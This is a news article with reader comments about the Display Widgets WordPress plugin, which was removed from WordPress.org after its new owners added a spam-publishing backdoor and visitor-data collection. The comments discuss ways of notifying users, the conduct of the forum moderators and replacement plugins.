Display Widgets Plugin Permanently Removed from WordPress.org Due to Malicious Code

Display Widgets, a plugin with more than 200,000 active installs, has been removed from WordPress.org due to its authors inserting malicious code. SEO consultant David Law was the first to bring this issue to the attention of the plugin team after discovering that Display Widgets was inserting content into sites from external servers and also collecting visitor data without permission. He posted to the WordPress.org forums several times to warn other users.

Wordfence has been warning its customers about the plugin during the past several months and published a timeline tracking how Display Widgets was removed from WordPress.org on four separate occasions. According to their independent investigation, the plugin included a backdoor that allowed the plugin author to publish spam content to the sites where Display Widgets is installed. It also prevented logged-in users from being able to see the content.

Pagely banned the Display Widgets plugin from its hosting platform this week:

For our customer’s safety, we have banned the plugin from our customer sites…The plugin will remained banned on our network until a time that we see someone has taken responsibility for the plugin and the future of patching its code.

Display Widgets had recently changed hands, as it was acquired from the team that created Formidable Forms. The previous owners have issued a warning about the plugin on Twitter, advising users to remove it from their sites.

It is not yet confirmed whether the plugin was acquired solely for the purpose of distributing malware, but its new owners have been fairly persistent about getting it added back to WordPress.org after each of its violations.

Display Widgets Users Advised to Update to Version 2.7 or Remove the Plugin

Users have no way of finding out that they are running malicious code unless they hear about from their host, security company, or some other third party. They do not receive a notice in the WordPress admin about the plugin having been removed from the directory. Since Display Widgets was a fairly popular plugin, there are likely many sites that still have it active and those website owners are probably unaware of the spam content they are publishing.

Yesterday the plugin team issued a notice that Display Widgets 2.7 is a clean version that restores the plugin to version 2.0.5 before the malicious code was added:

We will be leaving this version deploying updates, however at this time we will NOT be allowing for its adoption. The second owner has effectively destroyed any trust a person might have in the plugin.

Note: You CANNOT visit the page or download it as a new plugin for a reason. This plugin is done. It’s not supported, it’s not worked on, nothing. So if you have it, upgrade. Otherwise, find something else to use.

Display Widgets is now likely to end up in the graveyard of abandoned plugins, but there are many other options for adding conditional widget display to WordPress sites. Jetpack’s widget visibility module, Widget Options by Phpbits Creative Studio, Custom Sidebars by WPMU Dev, and Content Aware Sidebars are a few popular alternatives on WordPress.org.

The plugin team does not currently disclose why certain plugins have been closed or removed from WordPress.org, but they are working on providing better communication for users. One meta trac ticket requests that closed plugins have a public page instead of disappearing completely. In another related ticket, plugin team member Mika Epstein has proposed that when plugins are closed or disabled, there should be a dropdown for WordPress.org admins to select a reason why. She suggested the following as available options:

  • Security Issue
  • Author Request
  • Guideline Violation
  • Licensing/Trademark violations
  • Merged into Core

The issue with Display Widgets was fairly public as users posted about their investigations on the WordPress.org support forums and various companies issued warnings about it. However, many plugins are disabled without the public knowing why. Even a short explanation like the proposed examples above would be a major improvement over leaving WordPress.org plugin users in the dark. It would assist site owners in knowing whether they need to prioritize looking for an alternative or simply wait until the situation is resolved.

29 Comments


  1. I’m surprised there’s no software check in place that scans the code for disallowed PHP or JS functions ( base64_encode(), etc ) when pushing up to the Repo… That would’ve thrown a red flag immediately.

    Report


    1. Agreed 100%. I’m baffled that base64 code doesn’t get immediately rejected by the WP Repo.

      Report


      1. Any use of Base 64 in plugins actually sends me an email when committed. I read all of those emails and look at the code. 99% of them are totally harmless and reasonable. I’ve continued to read them all for the last 5 years because of that 1% that’s not.

        Report


    2. This makes me wonder how many others plugins there might be on .org containing intentionally malicious code. Are there any third parties that scan the directory for these things?

      Report


      1. In June we started monitoring changes made to plugins in the directory to try to catch some serious vulnerabilities. Some of the checks we do are based off of previous instances of intentionally or possibly intentionally malicious code. So that could catch some future instances of it, but realistically it would very difficult to catch instances where the developer makes an effort to hide what they are doing, as was the case with what was done with this plugin, with that type of monitoring. It would great if other companies were doing that type of monitoring as well, as even without catching intentionally malicious code, there are plenty of vulnerabilities in plugins that could be caught through that, based on the vulnerabilities we have found so far.

        We also monitor the support forum for indications of security issues in plugins, which could pick up some discussions that point to intentionally malicious code being in plugins, but with this situation it only alerted us to what was going on at the end. If someone is aware of a security situation with a plugin that isn’t getting properly handled in the future, please lets us know.

        We are not aware of any disallowed PHP or JS function and there doesn’t appear to be any mention of that in the developer guidelines. If there are any that are disallowed that have security implications, please let us know and we can start monitoring for usage of them.

        Report


  2. Pretty pathetic the Author wants people to “cut me some slack” with malicious code. C’mon now.

    Report


  3. Just putting a reason or a public page on a removed plugin is not enough. How many times after you’ve installed a plugin have you gone back to that plugin’s page on the repo? In most cases, I would think, that would be zero. So you would never know it even got removed, much less why.

    The are two responsible solutions to this problem as I see it, and both are necessary.

    1. A notification must be shown on every site’s Plugin admin page that is using the plugin. Just as though the plugin had an update, it should have a link that shows “Important Notice” or some such wording instead of “There is a new version available”. And of course, that notice should be linked to some sort of notification that the plugin has been removed and why. (Don’t even tell me that would make security worse. Please….we live in an age where disclosure is the right thing, not the wrong thing).

    2. If a plugin is “removed” permanently, a version that is reverted to a known-good version or a fixed version should be put in its place, and frozen…just as was finally done in this particular case. I like the way they finally handled this one.

    It’s kind of insane that current users of plugins removed for security reasons never ever know that there is a problem with the plugin they are using, unless they just happen to run across someone talking about it on a blog or social media somewhere. That’s.just.crazy. Notify users, dang it. NOTIFY USERS. Geez.

    Report


    1. I’ve said the same thing a hundred times.

      Beyond that, I used the original version of Display Widgets on over 100 sites. Went to look for it in July and it was delisted. Looked into why and found discussion about the spammy links. My coworkers and I had this exact discussion then, regarding this exact plugin!

      Report


    2. I fully agree that following these 2 steps would be a great solution for cases like this.

      It should already be possible for the security team at wordpress.org to push out automatic plugin security updates so sites will update affected plugins in the background (like core):
      https://make.wordpress.org/plugins/2015/03/14/plugin-automatic-security-updates/

      Plugin readmes also have a section called “Upgrade Notice” but as far as I know, anything written there are not parsed or displayed anywhere to the user. That could be used to display important notices for a specific update, but as plugin developers can change the text themselves, I could see how it could be abused.

      As with everything else, communication is key.

      Report


      1. For your information, I discovered ThreatPress plugin: https://wordpress.org/plugins/threatpress-security/ . They are checking all your site’s plugins and themes against their database of vulnerabilities which they say is updated daily. It includes all known vulnerabilities, Display Widgets too.

        Report


    3. In total agreement with Joachim! Last week when I saw an update for the plugin and the accompanying “Rollback to version x.y to remove recent changes” message caused me to be curious as to what was going on. First thing I did was head for the plugin repo to see the changelog as the link in WP admin wasn’t working, but couldn’t find the plugin.

      In cases like this a ‘holding page’ with more information / advice on how to proceed will benefit everyone, especially WordPress newbies.

      Report


  4. At least 3 things are surprising here:

    – WP moderator’s tone in messages about this removal (I would rather apologize for letting such mess happen instead of giving military style orders and closing comments)

    – The total absence of suggested alternatives for the 200,000 existing installs (this article provides some of them but do all users that installed this thing 200,000 times read it here? – I would rather have kept the plugin’s page live and provide alternatives for them there + alert them about about what happened)

    – How come there is no CLASS ACTION SUIT for such cases? (200,000 installs would represent something like 10,000 abused users and that would make a nice lawsuit to serve as example for the next ones that would like to try playing the same game).

    Report


  5. I’ve emailed the wordpress team when i discovered hidden spam pages on my blog, they did took the plugin down, the problem is, taking it down does not solve the problem, they should provide a security warning and a clean update.

    Report


  6. That’s why plugin authors that sell/give up their plugins take so much care to release plugins in the good hands.

    I hope Formidable Forms had their lesson learned, as this whole story will have a negative impact on their brand name.

    Report


    1. Why would it have a negative impact on them? They are not, nor should they be responsible for what an individual or business does with the product once it has been legally sold and transferred.

      If your neighbors moved and the couple who bought the house stopped maintaining their yard, whose fault is that?

      I’m sure the plugin author didn’t sell Display Widgets expecting this to happen, but placing any of the blame on them whatsoever is wrong.

      Report


      1. It’s not about blaming, it’s about what will happen in real life. Pure psychology – your brand name related to something bad, etc.

        Probably many of their own clients were using this plugin and it doesn’t matter that plugin was sold, what matters is that websites that were using that plugin were affected in a very negative way.

        So plugin owner sold not only the plugin (a house), but also the phone book with contacts and the ability to enter houses of all the people on that book.

        That’s why when you read about acquisitions on WP Tavern, you notice how careful authors are when choosing the party that will inherit the product.

        Report


    2. Otto actually made a post about scenarios like this a while back. It’s worth a read: https://make.wordpress.org/plugins/2016/02/12/on-the-topic-of-selling-your-plugins/

      I agree that the people behind Formidable Forms should not be blamed for the buyer’s behaviour, and shouldn’t apologize or anything. It’s clear in the article on Wordfence that they regret selling the plugin to the new owner.

      Content Aware Sidebars, one of the alternatives Sarah mentioned, has never been for sale, but I still get unsolicited offers from time to time. As I never read the emails fully before marking them as spam, unfortunately I don’t know if I’ve been contacted by the same person(s) that acquired Display Widgets.

      Report


  7. I am a long-time user of this plugin. I installed the first update by the new plugin owner on a test site and immediately noticed problems, so did not install it (or any subsequent updates) on any live sites.

    My sites have not, therefore, been harmed by this episode. But I have been following closely what has been going on.

    What is missing from Sarah’s report is the shocking treatment meted out to David Law by the wordpress.org moderators. He even had his account suspended for a time!

    He was essentially acting as a whistle-blower, and yet got treated as if it were he who was in the wrong.

    Not for the first time, moderator Jan Dembowski behaved like a bully.

    And Mika Epstein’s own explanation of how this episode was allowed to unfold as it did paints her as naive in the extreme.

    To err is human. But their repeating the same mistakes in future would be less forgivable.

    A public apology to David Law would not go amiss.

    Report


  8. There’s just got to be a way to get the word out about these types of situations. Personally, I was alerted that the plugin was removed from the repository via the Wordfence plugin. Otherwise, I’d have no idea that this happened (and I work with WordPress and follow news daily).

    As for the defensive stance seen in the forums, I can attest to it. A forum post where we were discussing what happened to the plugin was closed to new comments:
    https://wordpress.org/support/topic/display-widgets-plugin-v2-6-3-1-includes-hacking-code/page/2/

    With the moderator stating:

    “I’m going through and closing posts about this. There’s little point in people going around and slamming others about this. Remember: people can be mean, but you don’t have to be.”

    I don’t even think anyone was directly trying to slam anyone. It was just a frustration of how this plugin was getting removed and re-added over the summer and that warnings about its malicious code may not have been handled so well.

    We just need a way to warn others when something like this occurs. Even if it’s a small notice on the plugins page.

    Report


  9. Over the years, I have happily used Display Widgets on dozens and perhaps 100’s of WordPress sites, with no problems. It’s such a shame that it has been acquired by such an unscrupulous company who has no respect for the WordPress community or its values. I know it’s a free plugin, but that doesn’t make it ok. Now I will have to change the MANY blog posts where I have recommended Display Widgets and switch to Jetpack Visibility or similar instead!

    Report


    1. It is a shame because Display Widgets was a really powerful plugin for what it did. This whole thing definitely put a lot of us in panic mode.

      Report


  10. I agree with the replies above. The mods on WordPress.org did not handle it very well IMHO. They should take lessons out of the situation instead of letting ego’s and power play get in the way. At least that’s how I perceive it. Not very community like… In the end they’re on the same side right? This kind of reaction may lead to people (whistle blowers) staying quiet and move on to something else.

    Another concern I share with others is how safe the repository still is. Also I think that this kind of threat does not limit itself to plugins only but may affect themes as well. Heck, it may not even be limited to the repo but extend to marketplaces as well.

    It’s another wake up call in which we all can take lessons out of.

    Report


  11. Thanks for suggesting Widget Options as a replacement. I’m the plugin creator and I’ve actually created a migration tool to move Display Widgets’ saved preferences to Widget Options. It’s my way of saying thanks to those who are choosing my plugin. The migration tool is available for free on github: https://github.com/phpbits/widget-options-migrator and has full details; and instructions here: https://widget-options.com/easily-migrate-display-widgets/ .

    Cheers!

    Report


    1. That’s fantastic Jeffrey, I was groaning at the thought of migrating our clients to another plugin because some of their Display Widgets settings are quite complex. I have been hoping that someone honest will take over Display Widgets and fork it! Please could you confirm whether Widget Options has a feature to show/hide widgets based on post ID?

      Report


      1. Hi,

        Sorry for late response, not sure why I wasn’t notified. Widget Options support for Post IDs is available on “Display Widget Logic” using is_single(). Using the migrator, it will automatically add this code for you :) Let me know how it goes. Thanks!

        Report

Comments are closed.